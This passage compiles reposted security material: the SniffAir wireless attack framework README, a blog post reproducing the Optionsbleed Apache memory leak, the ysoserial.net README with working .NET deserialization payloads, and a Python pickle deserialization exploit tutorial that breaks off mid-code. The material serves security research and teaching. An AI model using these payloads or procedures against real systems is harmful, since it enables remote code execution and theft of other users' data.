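def send_gelf_tcp(host, port, short_message, **fields):
    """Send a single GELF message over TCP. GELF TCP frames are plain
    JSON documents terminated by a null byte; custom fields must be
    prefixed with an underscore."""
    msg = {
        "version": "1.1",
        "host": "nzyme-sensor-1",   # hypothetical sensor name
        "short_message": short_message,
        "timestamp": time.time(),
    }
    msg.update({"_" + key: value for key, value in fields.items()})
    frame = json.dumps(msg).encode("utf-8") + b"\x00"
    with socket.create_connection((host, port), timeout=5) as sock:
        sock.sendall(frame)

# e.g. send_gelf_tcp("graylog.example.org", 12000, "beacon", ssid="Demo", channel=11)
```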
SniffAir SniffAir is an open-source wireless security framework. SniffAir allows for the collection, management, and analysis of wireless traffic. In addition, SniffAir can also be used to perform sophisticated wireless attacks. SniffAir was born out of the hassle of managing large or multiple pcap files while thoroughly cross-examining and analyzing the traffic, looking for potential security flaws or malicious traffic. SniffAir is developed by @Tyl0us and @theDarracott Install To install, run the setup.py script: $ python setup.py Usage % * ., % % ( ,# (..# % /@@@@@&, *@@% &@, @@# /@@@@@@@@@ .@@@@@@@@@. ,/ # # (%%%* % (.(. .@@ &@@@@@@%. .@@& *&@ %@@@@. &@, @@% %@@,,,,,,, ,@@,,,,,,, .( % % %%# # % # ,@@ @@(,,,#@@@. %@% %@@(@@. &@, @@% %@@ ,@@ /* # /*, %.,, ,@@ @@* #@@ ,@@& %@@ ,@@* &@, @@% %@@ ,@@ .# //#(, (, ,@@ @@* &@% .@@@@@. %@@ .@@( &@, @@% %@@%%%%%%* ,@@%%%%%%# (# ##. ,@@ @@&%%%@@@% *@@@@ %@@ .@@/ &@, @@% %@@,,,,,, ,@@,,,,,,. %#####% ,@@ @@(,,%@@% @@% %@@ @@( &@, @@% %@@ ,@@ % (*/ # ,@@ @@* @@@ %@% %@@ @@&&@, @@% %@@ ,@@ % # .# .# ,@@ @@* @@% .@@&/,,#@@@ %@@ &@@@, @@% %@@ ,@@ /(* /(# ,@@ @@* @@# *%@@@&* *%# ,%# #%/ *%# %% #############. .%# #%. .%% (@Tyl0us & @theDarracott) >> [default]# help Commands ======== workspace Manages workspaces (create, list, load, delete) live_capture Initiates a valid wireless interface to collect wireless packets to be parsed (requires the interface name) offline_capture Begins parsing wireless packets using a pcap file - Kismet .pcapdump files work best (requires the full path) offline_capture_list Begins parsing wireless packets using a list of pcap files - Kismet .pcapdump files work best (requires the full path) query Executes a query on the contents of the active workspace help Displays this help menu clear Clears the screen show Shows the contents of a table, specific information across all tables or the available modules inscope Add ESSID to scope.
inscope [ESSID] use Use a SniffAir module info Displays all variable information regarding the selected module set Sets a variable in a module exploit Runs the loaded module exit Exit SniffAir >> [default]# Begin First, create or load a new or existing workspace using the workspace create <workspace> or workspace load <workspace> command. To view all existing workspaces, use the workspace list command, and use the workspace delete <workspace> command to delete the desired workspace: >> [default]# workspace Manages workspaces Command Option: workspaces [create|list|load|delete] >> [default]# workspace create demo [+] Workspace demo created Load data into a desired workspace from a pcap file using the command offline_capture <the full path to the pcap file>. To load a series of pcap files, use the command offline_capture_list <the full path to the file containing the list of pcap names> (this file should contain the full paths to each pcap file). >> [demo]# offline_capture /root/sniffair/demo.pcapdump \ [+] Completed [+] Cleaning Up Duplicates [+] ESSIDs Observed Show Command The show command displays the contents of a table, specific information across all tables, or the available modules, using the following syntax: >> [demo]# show table AP +------+-----------+-------------------+-------------------------------+--------+-------+-------+----------+--------+ | ID | ESSID | BSSID | VENDOR | CHAN | PWR | ENC | CIPHER | AUTH | |------+-----------+-------------------+-------------------------------+--------+-------+-------+----------+--------| | 1 | HoneyPot | c4:6e:1f:0c:82:03 | TP-LINK TECHNOLOGIES CO. LTD. | 4 | -17 | WPA2 | TKIP | MGT | | 2 | Demo | 80:2a:a8:5a:fb:2a | Ubiquiti Networks Inc. | 11 | -19 | WPA2 | CCMP | PSK | | 3 | Demo5ghz | 82:2a:a8:5b:fb:2a | Unknown | 36 | -27 | WPA2 | CCMP | PSK | | 4 | HoneyPot1 | c4:6e:1f:0c:82:05 | TP-LINK TECHNOLOGIES CO. LTD.
| 36 | -29 | WPA2 | TKIP | PSK | | 5 | BELL456 | 44:e9:dd:4f:c2:7a | Sagemcom Broadband SAS | 6 | -73 | WPA2 | CCMP | PSK | +------+-----------+-------------------+-------------------------------+--------+-------+-------+----------+--------+ >> [demo]# show SSIDS --------- HoneyPot Demo HoneyPot1 BELL456 Hidden Demo5ghz --------- The query command can be used to display a unique set of data based on the parameters specified. The query command uses SQL syntax. Modules Modules can be used to analyze the data contained in the workspaces or perform offensive wireless attacks using the use <module name> command. For some modules, additional variables may need to be set. They can be set using the set command: set <variable name> <variable value>: >> [demo]# show modules Available Modules [+] Run Hidden SSID [+] Evil Twin [+] Captive Portal [+] Auto EAP [+] Exporter >> [demo]# >> [demo]# use Captive Portal >> [demo][Captive Portal]# info Globally Set Variables ===================== Module: Captive Portal Interface: SSID: Channel: Template: Cisco (More to be added soon) >> [demo][Captive Portal]# set Interface wlan0 >> [demo][Captive Portal]# set SSID demo >> [demo][Captive Portal]# set Channel 1 >> [demo][Captive Portal]# info Globally Set Variables ===================== Module: Captive Portal Interface: wlan0 SSID: demo Channel: 1 Template: Cisco (More to be added soon) >> [demo][Captive Portal]# Once all variables are set, execute the exploit command to run the desired attack. Export To export all information stored in a workspace's tables, use the Exporter module and set the desired path. Sursa: https://github.com/Tylous/SniffAir
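Since the query command takes plain SQL, queries against the tables above look like ordinary SELECT statements. The sketch below recreates a miniature AP table in SQLite to illustrate the kind of filter you might run (the column names follow the show table AP output; SniffAir's actual storage backend is not detailed in this README):

```python
import sqlite3

# Recreate a miniature AP table with the columns shown above
conn = sqlite3.connect(":memory:")
conn.execute(
    "CREATE TABLE AP (ESSID TEXT, BSSID TEXT, CHAN INTEGER, "
    "PWR INTEGER, ENC TEXT, CIPHER TEXT)"
)
conn.executemany(
    "INSERT INTO AP VALUES (?, ?, ?, ?, ?, ?)",
    [
        ("HoneyPot", "c4:6e:1f:0c:82:03", 4, -17, "WPA2", "TKIP"),
        ("Demo", "80:2a:a8:5a:fb:2a", 11, -19, "WPA2", "CCMP"),
        ("Demo5ghz", "82:2a:a8:5b:fb:2a", 36, -27, "WPA2", "CCMP"),
    ],
)

# e.g. "all WPA2 networks still using TKIP" -- a typical hunt query
for essid, bssid in conn.execute(
    "SELECT ESSID, BSSID FROM AP WHERE ENC = 'WPA2' AND CIPHER = 'TKIP'"
):
    print(essid, bssid)  # prints: HoneyPot c4:6e:1f:0c:82:03
```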
Testing Optionsbleed Written by: Mike Czumak Written on: September 23, 2017 Introduction I took a few minutes to test the Optionsbleed vuln (CVE-2017-9798), specifically to see whether modifying the length and/or quantity of Options/Methods in the .htaccess file would enable me to extract anything of substance from memory. Ultimately, it seems that by modifying the length of the entries in the .htaccess file, I was able to gain access to hundreds of bytes of POST data of a different virtual host. Details My setup was simple: two virtual hosts running on an Apache server hosted on a Linux VM. Each virtual host ran on a different port and had separate directories and error logs. Virtual Host 1 (running on port 80) was simply hosting a "hello" index.html. This was going to be my "attacker" site that would host the malicious .htaccess file. Virtual Host 2 (the "victim" site running on port 81) was hosting a PHP page that takes three inputs: username, password, and a third, variable-length variable.

<?php
$user = $_POST["username"];
$pwd = $_POST["password"];
$otherdata = $_POST["otherdata"];
?>
<form action="index.php" method="POST">
Otherdata: <input type="text" name="otherdata"><br>
Username: <input type="text" name="username"><br>
Password: <input type="text" name="password"><br>
<input type="submit" value="Submit">
</form>

Throughout the remainder of this post, I'll refer to them as Site1 (the attacker site on Virtual Host 1) and Site2 (the victim site on Virtual Host 2).
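The repeated OPTIONS requests used throughout this post are driven by Burp Intruder, but the same probing is easy to script. A minimal sketch (Python standard library only; the host name is a placeholder for Site1):

```python
import http.client

def read_allow_header(host, port=80, path="/"):
    """Send one OPTIONS request and return the Allow response header --
    the header that Optionsbleed corrupts with leaked memory."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    conn.request("OPTIONS", path)
    response = conn.getresponse()
    response.read()  # drain the (usually empty) body
    allow = response.getheader("Allow")
    conn.close()
    return allow

# Against a vulnerable server you would loop and watch for garbage:
# for _ in range(1000):
#     print(read_allow_header("site1.example"))
```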
I started with an .htaccess file on Site1 that looked as follows:

<Limit method0 method1 method2 method3 method4 method5>
Allow from all
</Limit>

Making several OPTIONS requests for Site1 resulted in a modified but fairly innocuous Allow header: Allow: GET,POST,OPTIONS,HEAD,,allow,,,,,,,,,,,,,,, Slight modifications in content and length did return a few varying bytes, but nothing very different from the examples I had already seen online and nothing that was of particular interest. I started extending the length of each option/method in the .htaccess file (using a simple numeric string of 0123456789) until I got to the following: <Limit 0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789 01234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456
7890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789 
01234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
> Allow from all </Limit> It's three entries of different lengths: 100, 3000, and 2000. After multiple OPTIONS requests I got this: [screenshot] Definitely good length, but the content is uninteresting. I let Burp Intruder continue to make OPTIONS requests while I submitted a test POST request on Site2. While the POST on Site2 was successful, my OPTIONS requests running on Site1 began generating 500 errors. I looked at the error log on Site1 and saw multiple entries of varying content that looked like the following: [Thu Sep 21 23:45:44.990337 2017] [http:error] [pid 74566] [client 192.168.1.234:62875] AH02430: Response header 'Allow' value of 'GET,OPTIONS,POST,HEAD,0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901(@\xe8\x0f\xb2\x7f' contains invalid characters, aborting requ It appeared that some of the non-ASCII content it was grabbing from memory was making the request invalid to Apache, resulting in the 500 error. I figured it was a long shot, but I tried HttpProtocolOptions Unsafe to see if the data could be returned to the client, but some of the characters were still considered invalid. Nevertheless, I figured it didn't matter much, given that the more viable attack vector would be a malicious actor modifying the .htaccess file on their virtual host in a shared hosting environment. It would stand to reason that they would also have access to their own web server error logs as well (and wouldn't need to rely on data returned to the client). So, now I wanted to see if it was possible to access the POST data from Site2 in the error log of Site1 by modifying the .htaccess file further. After a bit of trial and error, I was able to consistently obtain POST data from Site2 in Site1's error logs by doing the following: First, I used the earlier .htaccess file with the initial set of three varying-length numerical strings (100, 3000, 2000) and made a few thousand OPTIONS requests via Burp Intruder.
Then, I switched up the .htaccess file to read as follows:

<Limit 0123456789 0123456789 0123456789>
Allow from all
</Limit>

I left the Burp Intruder OPTIONS requests running on Site1 with this .htaccess file, which began to generate 500 errors. While that was running, I submitted the following request to the PHP page on Site2: [screenshot] And here's what I got in the error log on Site1: [screenshot] If you try to replicate this, you may get different results, especially if you deviate in length for either the .htaccess entries or the POST request on Virtual Host 2. Obviously, in an attack scenario, only the .htaccess file would be under the bad actor's control, and the POST request on another virtual host would be unpredictable in content and length. However, I did find that varying lengths still resulted in data captured in the error log… it just may not be consistent. Experiment to see for yourself. UPDATE #1: I intentionally didn't speculate on whether these test results are in any way significant, simply because I may be missing something that would make this impractical in unpatched environments. Most organizations aren't likely going to have exposed shared hosting environments in their own network anyway (and if they do provide the ability for untrusted actors to modify .htaccess on their servers, they have bigger problems). For those that have web applications hosted by external hosting providers, my test environment may have been too simple, or I might be missing a key consideration regarding shared memory and the typical multi-tenant hosting environment. In any event, I figured I would share these results in case it's helpful for others to investigate further and either replicate or disprove them. UPDATE #2: I have been able to get the POST data from Site2 to return directly to the client without generating an error fairly consistently by swapping out the values in the .htaccess file multiple times while the OPTIONS requests are running.
Here is what has been working for me: Start running the OPTIONS requests on Site1 using Intruder (I just let it run for 99,999 requests) using the 100, 3000, 2000 length values in .htaccess. Modify .htaccess to use the three smaller 0123456789, 0123456789, 0123456789 values as shown previously. Switch back to the 100, 3000, 2000 lengths. Modify the .htaccess file again, this time using ten 0123456789 values. Submit the POST request on Site2. Below is the result in *most* cases: [screenshot] Again, keep in mind that this is partly dependent upon the length of the POST request submitted on Site2. You can adjust the length of the testdata string to see how your results vary. Until next time, Mike Sursa: https://www.securitysift.com/testing-optionsbleed/
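The long numeric method names used in these tests are tedious to produce by hand. A throwaway generator (a sketch; pass whatever lengths you want to trial) builds the <Limit> block:

```python
def make_htaccess(lengths):
    """Build a <Limit> block whose 'methods' are the string 0123456789
    repeated and trimmed to the requested lengths, e.g. [100, 3000, 2000]."""
    digits = "0123456789"
    methods = [(digits * (n // len(digits) + 1))[:n] for n in lengths]
    return "<Limit %s>\nAllow from all\n</Limit>\n" % " ".join(methods)

# Preview only the start; the full block for [100, 3000, 2000] is ~5 KB
print(make_htaccess([100, 3000, 2000])[:50])
```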
ysoserial.net A proof-of-concept tool for generating payloads that exploit unsafe .NET object deserialization. Description ysoserial.net is a collection of utilities and property-oriented programming "gadget chains" discovered in common .NET libraries that can, under the right conditions, exploit .NET applications performing unsafe deserialization of objects. The main driver program takes a user-specified command and wraps it in the user-specified gadget chain, then serializes these objects to stdout. When an application with the required gadgets on the classpath unsafely deserializes this data, the chain will automatically be invoked and cause the command to be executed on the application host. It should be noted that the vulnerability lies in the application performing unsafe deserialization and NOT in having gadgets on the classpath. This project is inspired by Chris Frohoff's ysoserial project Disclaimer This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly. This software is a personal project and is not related to any company, including the project owner's and contributors' employers. Usage $ ./ysoserial -h ysoserial.net generates deserialization payloads for a variety of .NET formatters. Available formatters: ActivitySurrogateSelector (ActivitySurrogateSelector gadget by James Forshaw. This gadget ignores the command parameter and executes the constructor of ExploitClass class.) Formatters: BinaryFormatter ObjectStateFormatter SoapFormatter LosFormatter ObjectDataProvider (ObjectDataProvider Gadget by Oleksandr Mirosh and Alvaro Munoz) Formatters: Json.Net FastJson JavaScriptSerializer PSObject (PSObject Gadget by Oleksandr Mirosh and Alvaro Munoz.
Target must run a system not patched for CVE-2017-8565 (Published: 07/11/2017)) Formatters: BinaryFormatter ObjectStateFormatter SoapFormatter NetDataContractSerializer LosFormatter TypeConfuseDelegate (TypeConfuseDelegate gadget by James Forshaw) Formatters: BinaryFormatter ObjectStateFormatter NetDataContractSerializer LosFormatter Usage: ysoserial.exe [options] Options: -o, --output=VALUE the output format (raw|base64). -g, --gadget=VALUE the gadget chain. -f, --formatter=VALUE the formatter. -c, --command=VALUE the command to be executed. -t, --test whether to run payload locally. Default: false -h, --help show this message and exit Examples $ ./ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "calc" -t { '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35', 'MethodName':'Start', 'MethodParameters':{ '$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089', '$values':['cmd','/ccalc'] }, 'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'} } $ ./ysoserial.exe -f BinaryFormatter -g PSObject -o base64 -c "calc" -t 
AAEAAAD/////AQAAAAAAAAAMAgAAAF9TeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLCBWZXJzaW9uPTMuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MzFiZjM4NTZhZDM2NGUzNQUBAAAAJVN5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uUFNPYmplY3QBAAAABkNsaVhtbAECAAAABgMAAACJFQ0KPE9ianMgVmVyc2lvbj0iMS4xLjAuMSIgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vcG93ZXJzaGVsbC8yMDA0LzA0Ij4mI3hEOw0KPE9iaiBSZWZJZD0iMCI+JiN4RDsNCiAgICA8VE4gUmVmSWQ9IjAiPiYjeEQ7DQogICAgICA8VD5NaWNyb3NvZnQuTWFuYWdlbWVudC5JbmZyYXN0cnVjdHVyZS5DaW1JbnN0YW5jZSNTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uL1J1bnNwYWNlSW52b2tlNTwvVD4mI3hEOw0KICAgICAgPFQ+TWljcm9zb2Z0Lk1hbmFnZW1lbnQuSW5mcmFzdHJ1Y3R1cmUuQ2ltSW5zdGFuY2UjUnVuc3BhY2VJbnZva2U1PC9UPiYjeEQ7DQogICAgICA8VD5NaWNyb3NvZnQuTWFuYWdlbWVudC5JbmZyYXN0cnVjdHVyZS5DaW1JbnN0YW5jZTwvVD4mI3hEOw0KICAgICAgPFQ+U3lzdGVtLk9iamVjdDwvVD4mI3hEOw0KICAgIDwvVE4+JiN4RDsNCiAgICA8VG9TdHJpbmc+UnVuc3BhY2VJbnZva2U1PC9Ub1N0cmluZz4mI3hEOw0KICAgIDxPYmogUmVmSWQ9IjEiPiYjeEQ7DQogICAgICA8VE5SZWYgUmVmSWQ9IjAiIC8+JiN4RDsNCiAgICAgIDxUb1N0cmluZz5SdW5zcGFjZUludm9rZTU8L1RvU3RyaW5nPiYjeEQ7DQogICAgICA8UHJvcHM+JiN4RDsNCiAgICAgICAgPE5pbCBOPSJQU0NvbXB1dGVyTmFtZSIgLz4mI3hEOw0KCQk8T2JqIE49InRlc3QxIiBSZWZJZCA9IjIwIiA+ICYjeEQ7DQogICAgICAgICAgPFROIFJlZklkPSIxIiA+ICYjeEQ7DQogICAgICAgICAgICA8VD5TeXN0ZW0uV2luZG93cy5NYXJrdXAuWGFtbFJlYWRlcltdLCBQcmVzZW50YXRpb25GcmFtZXdvcmssIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1PC9UPiYjeEQ7DQogICAgICAgICAgICA8VD5TeXN0ZW0uQXJyYXk8L1Q+JiN4RDsNCiAgICAgICAgICAgIDxUPlN5c3RlbS5PYmplY3Q8L1Q+JiN4RDsNCiAgICAgICAgICA8L1ROPiYjeEQ7DQogICAgICAgICAgPExTVD4mI3hEOw0KICAgICAgICAgICAgPFMgTj0iSGFzaCIgPiAgDQoJCSZsdDtSZXNvdXJjZURpY3Rpb25hcnkNCiAgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiINCiAgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiDQogIHhtbG5zOlN5c3RlbT0iY2xyLW5hbWVzcGFjZTpTeXN0ZW07YXNzZW1ibHk9bXNjb3JsaWIiDQogIHhtbG5zOkRpYWc9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PXN5c3RlbSImZ3Q7DQoJICZs
dDtPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9IkxhdW5jaENhbGMiIE9iamVjdFR5cGUgPSAieyB4OlR5cGUgRGlhZzpQcm9jZXNzfSIgTWV0aG9kTmFtZSA9ICJTdGFydCIgJmd0Ow0KICAgICAmbHQ7T2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnMmZ3Q7DQogICAgICAgICZsdDtTeXN0ZW06U3RyaW5nJmd0O2NtZCZsdDsvU3lzdGVtOlN0cmluZyZndDsNCiAgICAgICAgJmx0O1N5c3RlbTpTdHJpbmcmZ3Q7L2MgImNhbGMiICZsdDsvU3lzdGVtOlN0cmluZyZndDsNCiAgICAgJmx0Oy9PYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycyZndDsNCiAgICAmbHQ7L09iamVjdERhdGFQcm92aWRlciZndDsNCiZsdDsvUmVzb3VyY2VEaWN0aW9uYXJ5Jmd0Ow0KCQkJPC9TPiYjeEQ7DQogICAgICAgICAgPC9MU1Q+JiN4RDsNCiAgICAgICAgPC9PYmo+JiN4RDsNCiAgICAgIDwvUHJvcHM+JiN4RDsNCiAgICAgIDxNUz4mI3hEOw0KICAgICAgICA8T2JqIE49Il9fQ2xhc3NNZXRhZGF0YSIgUmVmSWQgPSIyIj4gJiN4RDsNCiAgICAgICAgICA8VE4gUmVmSWQ9IjEiID4gJiN4RDsNCiAgICAgICAgICAgIDxUPlN5c3RlbS5Db2xsZWN0aW9ucy5BcnJheUxpc3Q8L1Q+JiN4RDsNCiAgICAgICAgICAgIDxUPlN5c3RlbS5PYmplY3Q8L1Q+JiN4RDsNCiAgICAgICAgICA8L1ROPiYjeEQ7DQogICAgICAgICAgPExTVD4mI3hEOw0KICAgICAgICAgICAgPE9iaiBSZWZJZD0iMyI+ICYjeEQ7DQogICAgICAgICAgICAgIDxNUz4mI3hEOw0KICAgICAgICAgICAgICAgIDxTIE49IkNsYXNzTmFtZSI+UnVuc3BhY2VJbnZva2U1PC9TPiYjeEQ7DQogICAgICAgICAgICAgICAgPFMgTj0iTmFtZXNwYWNlIj5TeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uPC9TPiYjeEQ7DQogICAgICAgICAgICAgICAgPE5pbCBOPSJTZXJ2ZXJOYW1lIiAvPiYjeEQ7DQogICAgICAgICAgICAgICAgPEkzMiBOPSJIYXNoIj40NjA5MjkxOTI8L0kzMj4mI3hEOw0KICAgICAgICAgICAgICAgIDxTIE49Ik1pWG1sIj4gJmx0O0NMQVNTIE5BTUU9IlJ1bnNwYWNlSW52b2tlNSIgJmd0OyZsdDtQUk9QRVJUWSBOQU1FPSJ0ZXN0MSIgVFlQRSA9InN0cmluZyIgJmd0OyZsdDsvUFJPUEVSVFkmZ3Q7Jmx0Oy9DTEFTUyZndDs8L1M+JiN4RDsNCiAgICAgICAgICAgICAgPC9NUz4mI3hEOw0KICAgICAgICAgICAgPC9PYmo+JiN4RDsNCiAgICAgICAgICA8L0xTVD4mI3hEOw0KICAgICAgICA8L09iaj4mI3hEOw0KICAgICAgPC9NUz4mI3hEOw0KICAgIDwvT2JqPiYjeEQ7DQogICAgPE1TPiYjeEQ7DQogICAgICA8UmVmIE49Il9fQ2xhc3NNZXRhZGF0YSIgUmVmSWQgPSIyIiAvPiYjeEQ7DQogICAgPC9NUz4mI3hEOw0KICA8L09iaj4mI3hEOw0KPC9PYmpzPgs= Contributing Fork it Create your feature branch (git checkout -b my-new-feature) Commit your changes (git commit -am 'Add some feature') Push to the 
branch (git push origin my-new-feature)
Create new Pull Request

Additional Reading
Are you my Type?
Friday the 13th: JSON Attacks - Slides
Friday the 13th: JSON Attacks - Whitepaper
Exploiting .NET Managed DCOM

Sursa: https://github.com/pwntester/ysoserial.net
Explaining and exploiting deserialization vulnerability with Python (EN)
Sat 23 September 2017 Dan Lousqui

Deserialization?
Even though it was neither present in OWASP TOP 10 2013 nor in OWASP TOP 10 2017 RC1, deserialization of untrusted data is a very serious vulnerability that appears more and more often in recent security disclosures. Serialization and deserialization are mechanisms used in many environments (web, mobile, IoT, ...) whenever you need to convert any object (an OOM, an array, a dictionary, a file descriptor, ... anything) into something that you can put "outside" of your application (network, file system, database, ...). The conversion works in both directions, and it is very convenient if you need to save or transfer data (e.g. sharing the state of a game in a multiplayer game, or creating an "export" / "backup" file in a project). However, we will see in this article how this kind of behavior can be very dangerous... and therefore why I think this vulnerability will be present in OWASP TOP 10 2017 RC2.

In python?
With Python, the default library used to serialize and deserialize objects is pickle. It is a really easy-to-use library (compared to something like sqlite3) and very convenient if you need to persist data. For example, if you want to save objects:

import pickle
import datetime

my_data = {}
my_data['last-modified'] = str(datetime.datetime.now())
my_data['friends'] = ["alice", "bob"]

pickle_data = pickle.dumps(my_data)
with open("backup.data", "wb") as file:
    file.write(pickle_data)

That will create a backup.data file with the following content:

last-modifiedqX2017-09-23 00:23:29.986499qXfriendsq]q(XaliceqXbobqeu.

And if you want to retrieve your data with Python, it's easy:

import pickle

with open("backup.data", "rb") as file:
    pickle_data = file.read()
my_data = pickle.loads(pickle_data)
my_data
# {'friends': ['alice', 'bob'], 'last-modified': '2001-01-01 01:02:03.456789'}

Awesome, isn't it?

Introducing... Pickle pRick !
In order to illustrate the awesomeness of pickle in terms of insecurity, I developed a vulnerable application. You can retrieve it from the TheBlusky/pickle-prick repository. As always with my Dockers, just execute the build.sh or build.bat script and the vulnerable project will be launched.

This application is for Ricks, from the Rick and Morty TV show. For those who don't know the show (shame...), Rick is a genius scientist who travels between universes and planets for great adventures with his grandson Morty. The show involves many multiverse and time-travel dilemmas. Each universe has its own Rick, so I developed an application for every Rick, so they can trace their adventures by storing when, where and with whom they travelled. Every Rick must be able to use the application, and the data should never be stored on the server, so one Rick cannot see the data of another Rick. To make this possible, a Rick can export his agenda into a pickle_rick.data file that can be imported later.

Obviously, this application is vulnerable (Rick would not offer other Ricks this kind of gift without a backdoor...). If you don't want to be spoiled and want to play a little game, you should stop reading this article, launch the application (locally) and try to pwn it (without looking at the exploit folder, obviously...).

What's wrong with Pickle?
pickle (like any other serialization / deserialization library) provides a way to execute arbitrary commands (even if few developers know it). To do that, you simply have to create an object that implements a __reduce__(self) method. This method should return a tuple whose first element is a callable and whose second element is a tuple of arguments. The callable will be executed with those arguments, and its return value will be the "deserialization" of the object.
For example, if you save the following pickle object:

import pickle
import os

class EvilPickle(object):
    def __reduce__(self):
        return (os.system, ('echo Powned', ))

pickle_data = pickle.dumps(EvilPickle())
with open("backup.data", "wb") as file:
    file.write(pickle_data)

and then later try to deserialize it:

import pickle

with open("backup.data", "rb") as file:
    pickle_data = file.read()
my_data = pickle.loads(pickle_data)

Powned will be displayed during the loads call, because echo Powned is executed. It is then easy to imagine what we can do with such a powerful vulnerability.

The exploit
In the pickle-prick application, pickle is used to retrieve all adventures:

async def do_import(request):
    session = await get_session(request)
    data = await request.post()
    try:
        pickle_prick = data['file'].file.read()
    except:
        session['errors'] = ["Couldn't read pickle prick file."]
        return web.HTTPFound('/')
    prick = base64.b64decode(pickle_prick.decode())
    session['adventures'] = [i for i in pickle.loads(prick)]
    return web.HTTPFound('/')

So if we upload a malicious pickle, it will be executed. However, if we want to be able to read the result of the code execution, the __reduce__ callable must return an object that matches the adventures signature (a list of dictionaries, each having a date, a universe, a planet and a morty). To achieve that, we will use the vulnerability twice: a first time to upload a malicious Python file, and a second time to execute it.

1. Generating a payload to generate a payload
We want to upload a Python file that contains a callable matching the adventures signature, which will be executed on the server.
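Before building such a payload, it can be instructive to look at what a malicious pickle actually contains. This snippet is an addition of mine, not part of the original article: the standard-library pickletools module disassembles a pickle stream without executing anything, so you can see the opcode that pushes os.system and the REDUCE opcode that calls it on load.

```python
import io
import os
import pickle
import pickletools

class EvilPickle(object):
    def __reduce__(self):
        # Same trick as above: pickle stores a reference to os.system
        # plus its argument, not the object's state.
        return (os.system, ('echo Powned', ))

blob = pickle.dumps(EvilPickle())

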